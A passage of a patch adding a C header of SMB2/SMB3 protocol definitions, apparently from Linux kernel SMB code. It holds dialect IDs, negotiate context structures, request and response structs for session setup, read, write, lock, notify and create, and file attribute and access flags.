++#define SMB2_SEC_MODE_FLAGS_ALL            0x0003
++
++/* Capabilities flags */
++#define SMB2_GLOBAL_CAP_DFS		0x00000001
++#define SMB2_GLOBAL_CAP_LEASING		0x00000002 /* Resp only New to SMB2.1 */
++#define SMB2_GLOBAL_CAP_LARGE_MTU	0X00000004 /* Resp only New to SMB2.1 */
++#define SMB2_GLOBAL_CAP_MULTI_CHANNEL	0x00000008 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_PERSISTENT_HANDLES 0x00000010 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_DIRECTORY_LEASING  0x00000020 /* New to SMB3 */
++#define SMB2_GLOBAL_CAP_ENCRYPTION	0x00000040 /* New to SMB3 */
++/* Internal types */
++#define SMB2_NT_FIND			0x00100000
++#define SMB2_LARGE_FILES		0x00200000
++
++#define SMB2_CLIENT_GUID_SIZE		16
++#define SMB2_CREATE_GUID_SIZE		16
++
++/* Dialects */
++#define SMB10_PROT_ID  0x0000 /* local only, not sent on wire w/CIFS negprot */
++#define SMB20_PROT_ID  0x0202
++#define SMB21_PROT_ID  0x0210
++#define SMB2X_PROT_ID  0x02FF
++#define SMB30_PROT_ID  0x0300
++#define SMB302_PROT_ID 0x0302
++#define SMB311_PROT_ID 0x0311
++#define BAD_PROT_ID    0xFFFF
++
++#define SMB311_SALT_SIZE			32
++/* Hash Algorithm Types */
++#define SMB2_PREAUTH_INTEGRITY_SHA512	cpu_to_le16(0x0001)
++#define SMB2_PREAUTH_HASH_SIZE 64
++
++/* Negotiate Contexts - ContextTypes. See MS-SMB2 section 2.2.3.1 for details */
++#define SMB2_PREAUTH_INTEGRITY_CAPABILITIES	cpu_to_le16(1)
++#define SMB2_ENCRYPTION_CAPABILITIES		cpu_to_le16(2)
++#define SMB2_COMPRESSION_CAPABILITIES		cpu_to_le16(3)
++#define SMB2_NETNAME_NEGOTIATE_CONTEXT_ID	cpu_to_le16(5)
++#define SMB2_TRANSPORT_CAPABILITIES		cpu_to_le16(6)
++#define SMB2_RDMA_TRANSFORM_CAPABILITIES	cpu_to_le16(7)
++#define SMB2_SIGNING_CAPABILITIES		cpu_to_le16(8)
++#define SMB2_POSIX_EXTENSIONS_AVAILABLE		cpu_to_le16(0x100)
++
++struct smb2_neg_context {
++	__le16	ContextType;
++	__le16	DataLength;
++	__le32	Reserved;
++	/* Followed by array of data. NOTE: some servers require padding to 8 byte boundary */
++} __packed;
++
++/*
++ * SaltLength that the server send can be zero, so the only three required
++ * fields (all __le16) end up six bytes total, so the minimum context data len
++ * in the response is six bytes which accounts for
++ *
++ *      HashAlgorithmCount, SaltLength, and 1 HashAlgorithm.
++ */
++#define MIN_PREAUTH_CTXT_DATA_LEN 6
++
++struct smb2_preauth_neg_context {
++	__le16	ContextType; /* 1 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	HashAlgorithmCount; /* 1 */
++	__le16	SaltLength;
++	__le16	HashAlgorithms; /* HashAlgorithms[0] since only one defined */
++	__u8	Salt[SMB311_SALT_SIZE];
++} __packed;
++
++/* Encryption Algorithms Ciphers */
++#define SMB2_ENCRYPTION_AES128_CCM	cpu_to_le16(0x0001)
++#define SMB2_ENCRYPTION_AES128_GCM	cpu_to_le16(0x0002)
++#define SMB2_ENCRYPTION_AES256_CCM      cpu_to_le16(0x0003)
++#define SMB2_ENCRYPTION_AES256_GCM      cpu_to_le16(0x0004)
++
++/* Min encrypt context data is one cipher so 2 bytes + 2 byte count field */
++#define MIN_ENCRYPT_CTXT_DATA_LEN	4
++struct smb2_encryption_neg_context {
++	__le16	ContextType; /* 2 */
++	__le16	DataLength;
++	__le32	Reserved;
++	/* CipherCount usally 2, but can be 3 when AES256-GCM enabled */
++	__le16	CipherCount; /* AES128-GCM and AES128-CCM by default */
++	__le16	Ciphers[];
++} __packed;
++
++/* See MS-SMB2 2.2.3.1.3 */
++#define SMB3_COMPRESS_NONE	cpu_to_le16(0x0000)
++#define SMB3_COMPRESS_LZNT1	cpu_to_le16(0x0001)
++#define SMB3_COMPRESS_LZ77	cpu_to_le16(0x0002)
++#define SMB3_COMPRESS_LZ77_HUFF	cpu_to_le16(0x0003)
++/* Pattern scanning algorithm See MS-SMB2 3.1.4.4.1 */
++#define SMB3_COMPRESS_PATTERN	cpu_to_le16(0x0004) /* Pattern_V1 */
++
++/* Compression Flags */
++#define SMB2_COMPRESSION_CAPABILITIES_FLAG_NONE		cpu_to_le32(0x00000000)
++#define SMB2_COMPRESSION_CAPABILITIES_FLAG_CHAINED	cpu_to_le32(0x00000001)
++
++struct smb2_compression_capabilities_context {
++	__le16	ContextType; /* 3 */
++	__le16  DataLength;
++	__le32	Reserved;
++	__le16	CompressionAlgorithmCount;
++	__le16	Padding;
++	__le32	Flags;
++	__le16	CompressionAlgorithms[3];
++	__u16	Pad;  /* Some servers require pad to DataLen multiple of 8 */
++	/* Check if pad needed */
++} __packed;
++
++/*
++ * For smb2_netname_negotiate_context_id See MS-SMB2 2.2.3.1.4.
++ * Its struct simply contains NetName, an array of Unicode characters
++ */
++struct smb2_netname_neg_context {
++	__le16	ContextType; /* 5 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	NetName[]; /* hostname of target converted to UCS-2 */
++} __packed;
++
++/*
++ * For smb2_transport_capabilities context see MS-SMB2 2.2.3.1.5
++ * and 2.2.4.1.5
++ */
++
++/* Flags */
++#define SMB2_ACCEPT_TRANSPORT_LEVEL_SECURITY	0x00000001
++
++struct smb2_transport_capabilities_context {
++	__le16	ContextType; /* 6 */
++	__le16  DataLength;
++	__u32	Reserved;
++	__le32	Flags;
++	__u32	Pad;
++} __packed;
++
++/*
++ * For rdma transform capabilities context see MS-SMB2 2.2.3.1.6
++ * and 2.2.4.1.6
++ */
++
++/* RDMA Transform IDs */
++#define SMB2_RDMA_TRANSFORM_NONE	0x0000
++#define SMB2_RDMA_TRANSFORM_ENCRYPTION	0x0001
++#define SMB2_RDMA_TRANSFORM_SIGNING	0x0002
++
++struct smb2_rdma_transform_capabilities_context {
++	__le16	ContextType; /* 7 */
++	__le16  DataLength;
++	__u32	Reserved;
++	__le16	TransformCount;
++	__u16	Reserved1;
++	__u32	Reserved2;
++	__le16	RDMATransformIds[];
++} __packed;
++
++/*
++ * For signing capabilities context see MS-SMB2 2.2.3.1.7
++ * and 2.2.4.1.7
++ */
++
++/* Signing algorithms */
++#define SIGNING_ALG_HMAC_SHA256    0
++#define SIGNING_ALG_HMAC_SHA256_LE cpu_to_le16(0)
++#define SIGNING_ALG_AES_CMAC       1
++#define SIGNING_ALG_AES_CMAC_LE    cpu_to_le16(1)
++#define SIGNING_ALG_AES_GMAC       2
++#define SIGNING_ALG_AES_GMAC_LE    cpu_to_le16(2)
++
++struct smb2_signing_capabilities {
++	__le16	ContextType; /* 8 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	SigningAlgorithmCount;
++	__le16	SigningAlgorithms[];
++	/*  Followed by padding to 8 byte boundary (required by some servers) */
++} __packed;
++
++#define POSIX_CTXT_DATA_LEN	16
++struct smb2_posix_neg_context {
++	__le16	ContextType; /* 0x100 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__u8	Name[16]; /* POSIX ctxt GUID 93AD25509CB411E7B42383DE968BCD7C */
++} __packed;
++
++struct smb2_negotiate_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 36 */
++	__le16 DialectCount;
++	__le16 SecurityMode;
++	__le16 Reserved;	/* MBZ */
++	__le32 Capabilities;
++	__u8   ClientGUID[SMB2_CLIENT_GUID_SIZE];
++	/* In SMB3.02 and earlier next three were MBZ le64 ClientStartTime */
++	__le32 NegotiateContextOffset; /* SMB3.1.1 only. MBZ earlier */
++	__le16 NegotiateContextCount;  /* SMB3.1.1 only. MBZ earlier */
++	__le16 Reserved2;
++	__le16 Dialects[];
++} __packed;
++
++struct smb2_negotiate_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 65 */
++	__le16 SecurityMode;
++	__le16 DialectRevision;
++	__le16 NegotiateContextCount;	/* Prior to SMB3.1.1 was Reserved & MBZ */
++	__u8   ServerGUID[16];
++	__le32 Capabilities;
++	__le32 MaxTransactSize;
++	__le32 MaxReadSize;
++	__le32 MaxWriteSize;
++	__le64 SystemTime;	/* MBZ */
++	__le64 ServerStartTime;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__le32 NegotiateContextOffset;	/* Pre:SMB3.1.1 was reserved/ignored */
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++
++/*
++ * SMB2_SESSION_SETUP  See MS-SMB2 section 2.2.5
++ */
++/* Flags */
++#define SMB2_SESSION_REQ_FLAG_BINDING		0x01
++#define SMB2_SESSION_REQ_FLAG_ENCRYPT_DATA	0x04
++
++struct smb2_sess_setup_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 25 */
++	__u8   Flags;
++	__u8   SecurityMode;
++	__le32 Capabilities;
++	__le32 Channel;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__le64 PreviousSessionId;
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++/* Currently defined SessionFlags */
++#define SMB2_SESSION_FLAG_IS_GUEST        0x0001
++#define SMB2_SESSION_FLAG_IS_GUEST_LE     cpu_to_le16(0x0001)
++#define SMB2_SESSION_FLAG_IS_NULL         0x0002
++#define SMB2_SESSION_FLAG_IS_NULL_LE      cpu_to_le16(0x0002)
++#define SMB2_SESSION_FLAG_ENCRYPT_DATA    0x0004
++#define SMB2_SESSION_FLAG_ENCRYPT_DATA_LE cpu_to_le16(0x0004)
++
++struct smb2_sess_setup_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 SessionFlags;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++
++/*
++ * SMB2_LOGOFF  See MS-SMB2 section 2.2.7
++ */
++struct smb2_logoff_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_logoff_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++
++/*
++ * SMB2_CLOSE  See MS-SMB2 section 2.2.15
++ */
++/* Currently defined values for close flags */
++#define SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB	cpu_to_le16(0x0001)
++struct smb2_close_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 24 */
++	__le16 Flags;
++	__le32 Reserved;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++} __packed;
++
++/*
++ * Maximum size of a SMB2_CLOSE response is 64 (smb2 header) + 60 (data)
++ */
++#define MAX_SMB2_CLOSE_RESPONSE_SIZE 124
++
++struct smb2_close_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* 60 */
++	__le16 Flags;
++	__le32 Reserved;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
++	__le64 EndOfFile;
++	__le32 Attributes;
++} __packed;
++
++
++/*
++ * SMB2_READ  See MS-SMB2 section 2.2.19
++ */
++/* For read request Flags field below, following flag is defined for SMB3.02 */
++#define SMB2_READFLAG_READ_UNBUFFERED	0x01
++#define SMB2_READFLAG_REQUEST_COMPRESSED 0x02 /* See MS-SMB2 2.2.19 */
++
++/* Channel field for read and write: exactly one of following flags can be set*/
++#define SMB2_CHANNEL_NONE               cpu_to_le32(0x00000000)
++#define SMB2_CHANNEL_RDMA_V1            cpu_to_le32(0x00000001)
++#define SMB2_CHANNEL_RDMA_V1_INVALIDATE cpu_to_le32(0x00000002)
++#define SMB2_CHANNEL_RDMA_TRANSFORM     cpu_to_le32(0x00000003)
++
++/* SMB2 read request without RFC1001 length at the beginning */
++struct smb2_read_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__u8   Padding; /* offset from start of SMB2 header to place read */
++	__u8   Flags; /* MBZ unless SMB3.02 or later */
++	__le32 Length;
++	__le64 Offset;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 MinimumCount;
++	__le32 Channel; /* MBZ except for SMB3 or later */
++	__le32 RemainingBytes;
++	__le16 ReadChannelInfoOffset;
++	__le16 ReadChannelInfoLength;
++	__u8   Buffer[1];
++} __packed;
++
++/* Read flags */
++#define SMB2_READFLAG_RESPONSE_NONE            cpu_to_le32(0x00000000)
++#define SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM  cpu_to_le32(0x00000001)
++
++struct smb2_read_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 17 */
++	__u8   DataOffset;
++	__u8   Reserved;
++	__le32 DataLength;
++	__le32 DataRemaining;
++	__le32 Flags;
++	__u8   Buffer[1];
++} __packed;
++
++
++/*
++ * SMB2_WRITE  See MS-SMB2 section 2.2.21
++ */
++/* For write request Flags field below the following flags are defined: */
++#define SMB2_WRITEFLAG_WRITE_THROUGH	0x00000001	/* SMB2.1 or later */
++#define SMB2_WRITEFLAG_WRITE_UNBUFFERED	0x00000002	/* SMB3.02 or later */
++
++struct smb2_write_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__le16 DataOffset; /* offset from start of SMB2 header to write data */
++	__le32 Length;
++	__le64 Offset;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++	__le32 Channel; /* MBZ unless SMB3.02 or later */
++	__le32 RemainingBytes;
++	__le16 WriteChannelInfoOffset;
++	__le16 WriteChannelInfoLength;
++	__le32 Flags;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_write_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 17 */
++	__u8   DataOffset;
++	__u8   Reserved;
++	__le32 DataLength;
++	__le32 DataRemaining;
++	__u32  Reserved2;
++	__u8   Buffer[1];
++} __packed;
++
++
++/*
++ * SMB2_FLUSH  See MS-SMB2 section 2.2.17
++ */
++struct smb2_flush_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 24 */
++	__le16 Reserved1;
++	__le32 Reserved2;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++} __packed;
++
++struct smb2_flush_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;
++	__le16 Reserved;
++} __packed;
++
++#define SMB2_LOCKFLAG_SHARED		0x0001
++#define SMB2_LOCKFLAG_EXCLUSIVE		0x0002
++#define SMB2_LOCKFLAG_UNLOCK		0x0004
++#define SMB2_LOCKFLAG_FAIL_IMMEDIATELY	0x0010
++#define SMB2_LOCKFLAG_MASK		0x0007
++
++struct smb2_lock_element {
++	__le64 Offset;
++	__le64 Length;
++	__le32 Flags;
++	__le32 Reserved;
++} __packed;
++
++struct smb2_lock_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 48 */
++	__le16 LockCount;
++	/*
++	 * The least significant four bits are the index, the other 28 bits are
++	 * the lock sequence number (0 to 64). See MS-SMB2 2.2.26
++	 */
++	__le32 LockSequenceNumber;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	/* Followed by at least one */
++	struct smb2_lock_element locks[1];
++} __packed;
++
++struct smb2_lock_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_echo_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__u16  Reserved;
++} __packed;
++
++struct smb2_echo_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__u16  Reserved;
++} __packed;
++
++/*
++ * Valid FileInformation classes for query directory
++ *
++ * Note that these are a subset of the (file) QUERY_INFO levels defined
++ * later in this file (but since QUERY_DIRECTORY uses equivalent numbers
++ * we do not redefine them here)
++ *
++ * FileDirectoryInfomation		0x01
++ * FileFullDirectoryInformation		0x02
++ * FileIdFullDirectoryInformation	0x26
++ * FileBothDirectoryInformation		0x03
++ * FileIdBothDirectoryInformation	0x25
++ * FileNamesInformation			0x0C
++ * FileIdExtdDirectoryInformation	0x3C
++ */
++
++/* search (query_directory) Flags field */
++#define SMB2_RESTART_SCANS		0x01
++#define SMB2_RETURN_SINGLE_ENTRY	0x02
++#define SMB2_INDEX_SPECIFIED		0x04
++#define SMB2_REOPEN			0x10
++
++struct smb2_query_directory_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 33 */
++	__u8   FileInformationClass;
++	__u8   Flags;
++	__le32 FileIndex;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le16 FileNameOffset;
++	__le16 FileNameLength;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_query_directory_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 OutputBufferOffset;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++/*
++ * Maximum number of iovs we need for a set-info request.
++ * The largest one is rename/hardlink
++ * [0] : struct smb2_set_info_req + smb2_file_[rename|link]_info
++ * [1] : path
++ * [2] : compound padding
++ */
++#define SMB2_SET_INFO_IOV_SIZE 3
++
++struct smb2_set_info_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 33 */
++	__u8   InfoType;
++	__u8   FileInfoClass;
++	__le32 BufferLength;
++	__le16 BufferOffset;
++	__u16  Reserved;
++	__le32 AdditionalInformation;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_set_info_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 2 */
++} __packed;
++
++/*
++ * SMB2_NOTIFY  See MS-SMB2 section 2.2.35
++ */
++/* notify flags */
++#define SMB2_WATCH_TREE			0x0001
++
++/* notify completion filter flags. See MS-FSCC 2.6 and MS-SMB2 2.2.35 */
++#define FILE_NOTIFY_CHANGE_FILE_NAME		0x00000001
++#define FILE_NOTIFY_CHANGE_DIR_NAME		0x00000002
++#define FILE_NOTIFY_CHANGE_ATTRIBUTES		0x00000004
++#define FILE_NOTIFY_CHANGE_SIZE			0x00000008
++#define FILE_NOTIFY_CHANGE_LAST_WRITE		0x00000010
++#define FILE_NOTIFY_CHANGE_LAST_ACCESS		0x00000020
++#define FILE_NOTIFY_CHANGE_CREATION		0x00000040
++#define FILE_NOTIFY_CHANGE_EA			0x00000080
++#define FILE_NOTIFY_CHANGE_SECURITY		0x00000100
++#define FILE_NOTIFY_CHANGE_STREAM_NAME		0x00000200
++#define FILE_NOTIFY_CHANGE_STREAM_SIZE		0x00000400
++#define FILE_NOTIFY_CHANGE_STREAM_WRITE		0x00000800
++
++/* SMB2 Notify Action Flags */
++#define FILE_ACTION_ADDED                       0x00000001
++#define FILE_ACTION_REMOVED                     0x00000002
++#define FILE_ACTION_MODIFIED                    0x00000003
++#define FILE_ACTION_RENAMED_OLD_NAME            0x00000004
++#define FILE_ACTION_RENAMED_NEW_NAME            0x00000005
++#define FILE_ACTION_ADDED_STREAM                0x00000006
++#define FILE_ACTION_REMOVED_STREAM              0x00000007
++#define FILE_ACTION_MODIFIED_STREAM             0x00000008
++#define FILE_ACTION_REMOVED_BY_DELETE           0x00000009
++
++struct smb2_change_notify_req {
++	struct smb2_hdr hdr;
++	__le16	StructureSize;
++	__le16	Flags;
++	__le32	OutputBufferLength;
++	__u64	PersistentFileId; /* opaque endianness */
++	__u64	VolatileFileId; /* opaque endianness */
++	__le32	CompletionFilter;
++	__u32	Reserved;
++} __packed;
++
++struct smb2_change_notify_rsp {
++	struct smb2_hdr hdr;
++	__le16	StructureSize;  /* Must be 9 */
++	__le16	OutputBufferOffset;
++	__le32	OutputBufferLength;
++	__u8	Buffer[1]; /* array of file notify structs */
++} __packed;
++
++
++/*
++ * SMB2_CREATE  See MS-SMB2 section 2.2.13
++ */
++/* Oplock levels */
++#define SMB2_OPLOCK_LEVEL_NONE		0x00
++#define SMB2_OPLOCK_LEVEL_II		0x01
++#define SMB2_OPLOCK_LEVEL_EXCLUSIVE	0x08
++#define SMB2_OPLOCK_LEVEL_BATCH		0x09
++#define SMB2_OPLOCK_LEVEL_LEASE		0xFF
++/* Non-spec internal type */
++#define SMB2_OPLOCK_LEVEL_NOCHANGE	0x99
++
++/* Impersonation Levels. See MS-WPO section 9.7 and MSDN-IMPERS */
++#define IL_ANONYMOUS		cpu_to_le32(0x00000000)
++#define IL_IDENTIFICATION	cpu_to_le32(0x00000001)
++#define IL_IMPERSONATION	cpu_to_le32(0x00000002)
++#define IL_DELEGATE		cpu_to_le32(0x00000003)
++
++/* File Attrubutes */
++#define FILE_ATTRIBUTE_READONLY			0x00000001
++#define FILE_ATTRIBUTE_HIDDEN			0x00000002
++#define FILE_ATTRIBUTE_SYSTEM			0x00000004
++#define FILE_ATTRIBUTE_DIRECTORY		0x00000010
++#define FILE_ATTRIBUTE_ARCHIVE			0x00000020
++#define FILE_ATTRIBUTE_NORMAL			0x00000080
++#define FILE_ATTRIBUTE_TEMPORARY		0x00000100
++#define FILE_ATTRIBUTE_SPARSE_FILE		0x00000200
++#define FILE_ATTRIBUTE_REPARSE_POINT		0x00000400
++#define FILE_ATTRIBUTE_COMPRESSED		0x00000800
++#define FILE_ATTRIBUTE_OFFLINE			0x00001000
++#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED	0x00002000
++#define FILE_ATTRIBUTE_ENCRYPTED		0x00004000
++#define FILE_ATTRIBUTE_INTEGRITY_STREAM		0x00008000
++#define FILE_ATTRIBUTE_NO_SCRUB_DATA		0x00020000
++#define FILE_ATTRIBUTE__MASK			0x00007FB7
++
++#define FILE_ATTRIBUTE_READONLY_LE              cpu_to_le32(0x00000001)
++#define FILE_ATTRIBUTE_HIDDEN_LE		cpu_to_le32(0x00000002)
++#define FILE_ATTRIBUTE_SYSTEM_LE		cpu_to_le32(0x00000004)
++#define FILE_ATTRIBUTE_DIRECTORY_LE		cpu_to_le32(0x00000010)
++#define FILE_ATTRIBUTE_ARCHIVE_LE		cpu_to_le32(0x00000020)
++#define FILE_ATTRIBUTE_NORMAL_LE		cpu_to_le32(0x00000080)
++#define FILE_ATTRIBUTE_TEMPORARY_LE		cpu_to_le32(0x00000100)
++#define FILE_ATTRIBUTE_SPARSE_FILE_LE		cpu_to_le32(0x00000200)
++#define FILE_ATTRIBUTE_REPARSE_POINT_LE		cpu_to_le32(0x00000400)
++#define FILE_ATTRIBUTE_COMPRESSED_LE		cpu_to_le32(0x00000800)
++#define FILE_ATTRIBUTE_OFFLINE_LE		cpu_to_le32(0x00001000)
++#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED_LE	cpu_to_le32(0x00002000)
++#define FILE_ATTRIBUTE_ENCRYPTED_LE		cpu_to_le32(0x00004000)
++#define FILE_ATTRIBUTE_INTEGRITY_STREAM_LE	cpu_to_le32(0x00008000)
++#define FILE_ATTRIBUTE_NO_SCRUB_DATA_LE		cpu_to_le32(0x00020000)
++#define FILE_ATTRIBUTE_MASK_LE			cpu_to_le32(0x00007FB7)
++
++/* Desired Access Flags */
++#define FILE_READ_DATA_LE		cpu_to_le32(0x00000001)
++#define FILE_LIST_DIRECTORY_LE		cpu_to_le32(0x00000001)
++#define FILE_WRITE_DATA_LE		cpu_to_le32(0x00000002)
++#define FILE_APPEND_DATA_LE		cpu_to_le32(0x00000004)
++#define FILE_ADD_SUBDIRECTORY_LE	cpu_to_le32(0x00000004)
++#define FILE_READ_EA_LE			cpu_to_le32(0x00000008)
++#define FILE_WRITE_EA_LE		cpu_to_le32(0x00000010)
++#define FILE_EXECUTE_LE			cpu_to_le32(0x00000020)
++#define FILE_DELETE_CHILD_LE		cpu_to_le32(0x00000040)
++#define FILE_READ_ATTRIBUTES_LE		cpu_to_le32(0x00000080)
++#define FILE_WRITE_ATTRIBUTES_LE	cpu_to_le32(0x00000100)
++#define FILE_DELETE_LE			cpu_to_le32(0x00010000)
++#define FILE_READ_CONTROL_LE		cpu_to_le32(0x00020000)
++#define FILE_WRITE_DAC_LE		cpu_to_le32(0x00040000)
++#define FILE_WRITE_OWNER_LE		cpu_to_le32(0x00080000)
++#define FILE_SYNCHRONIZE_LE		cpu_to_le32(0x00100000)
++#define FILE_ACCESS_SYSTEM_SECURITY_LE	cpu_to_le32(0x01000000)
++#define FILE_MAXIMAL_ACCESS_LE		cpu_to_le32(0x02000000)
++#define FILE_GENERIC_ALL_LE		cpu_to_le32(0x10000000)
++#define FILE_GENERIC_EXECUTE_LE		cpu_to_le32(0x20000000)
++#define FILE_GENERIC_WRITE_LE		cpu_to_le32(0x40000000)
++#define FILE_GENERIC_READ_LE		cpu_to_le32(0x80000000)
++#define DESIRED_ACCESS_MASK             cpu_to_le32(0xF21F01FF)
++
++
++#define FILE_READ_DESIRED_ACCESS_LE     (FILE_READ_DATA_LE        |	\
++					 FILE_READ_EA_LE          |     \
++					 FILE_GENERIC_READ_LE)
++#define FILE_WRITE_DESIRE_ACCESS_LE     (FILE_WRITE_DATA_LE       |	\
++					 FILE_APPEND_DATA_LE      |	\
++					 FILE_WRITE_EA_LE         |	\
++					 FILE_WRITE_ATTRIBUTES_LE |	\
++					 FILE_GENERIC_WRITE_LE)
++
++/* ShareAccess Flags */
++#define FILE_SHARE_READ_LE		cpu_to_le32(0x00000001)
++#define FILE_SHARE_WRITE_LE		cpu_to_le32(0x00000002)
++#define FILE_SHARE_DELETE_LE		cpu_to_le32(0x00000004)
++#define FILE_SHARE_ALL_LE		cpu_to_le32(0x00000007)
++
++/* CreateDisposition Flags */
++#define FILE_SUPERSEDE_LE		cpu_to_le32(0x00000000)
++#define FILE_OPEN_LE			cpu_to_le32(0x00000001)
++#define FILE_CREATE_LE			cpu_to_le32(0x00000002)
++#define	FILE_OPEN_IF_LE			cpu_to_le32(0x00000003)
++#define FILE_OVERWRITE_LE		cpu_to_le32(0x00000004)
++#define FILE_OVERWRITE_IF_LE		cpu_to_le32(0x00000005)
++#define FILE_CREATE_MASK_LE             cpu_to_le32(0x00000007)
++
++#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
++			| FILE_READ_ATTRIBUTES)
++#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++			| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
++#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
++
++/* CreateOptions Flags */
++#define FILE_DIRECTORY_FILE_LE		cpu_to_le32(0x00000001)
++/* same as #define CREATE_NOT_FILE_LE	cpu_to_le32(0x00000001) */
++#define FILE_WRITE_THROUGH_LE		cpu_to_le32(0x00000002)
++#define FILE_SEQUENTIAL_ONLY_LE		cpu_to_le32(0x00000004)
++#define FILE_NO_INTERMEDIATE_BUFFERING_LE cpu_to_le32(0x00000008)
++#define FILE_NON_DIRECTORY_FILE_LE	cpu_to_le32(0x00000040)
++#define FILE_COMPLETE_IF_OPLOCKED_LE	cpu_to_le32(0x00000100)
++#define FILE_NO_EA_KNOWLEDGE_LE		cpu_to_le32(0x00000200)
++#define FILE_RANDOM_ACCESS_LE		cpu_to_le32(0x00000800)
++#define FILE_DELETE_ON_CLOSE_LE		cpu_to_le32(0x00001000)
++#define FILE_OPEN_BY_FILE_ID_LE		cpu_to_le32(0x00002000)
++#define FILE_OPEN_FOR_BACKUP_INTENT_LE	cpu_to_le32(0x00004000)
++#define FILE_NO_COMPRESSION_LE		cpu_to_le32(0x00008000)
++#define FILE_OPEN_REPARSE_POINT_LE	cpu_to_le32(0x00200000)
++#define FILE_OPEN_NO_RECALL_LE		cpu_to_le32(0x00400000)
++#define CREATE_OPTIONS_MASK_LE          cpu_to_le32(0x00FFFFFF)
++
++#define FILE_READ_RIGHTS_LE (FILE_READ_DATA_LE | FILE_READ_EA_LE \
++			| FILE_READ_ATTRIBUTES_LE)
++#define FILE_WRITE_RIGHTS_LE (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE \
++			| FILE_WRITE_EA_LE | FILE_WRITE_ATTRIBUTES_LE)
++#define FILE_EXEC_RIGHTS_LE (FILE_EXECUTE_LE)
++
++/* Create Context Values */
++#define SMB2_CREATE_EA_BUFFER			"ExtA" /* extended attributes */
++#define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
++#define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
++#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
++#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
++#define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
++#define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
++#define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
++#define SMB2_CREATE_REQUEST_LEASE		"RqLs"
++#define SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2	"DH2Q"
++#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2	"DH2C"
++#define SMB2_CREATE_TAG_POSIX		"\x93\xAD\x25\x50\x9C\xB4\x11\xE7\xB4\x23\x83\xDE\x96\x8B\xCD\x7C"
++#define SMB2_CREATE_APP_INSTANCE_ID	"\x45\xBC\xA6\x6A\xEF\xA7\xF7\x4A\x90\x08\xFA\x46\x2E\x14\x4D\x74"
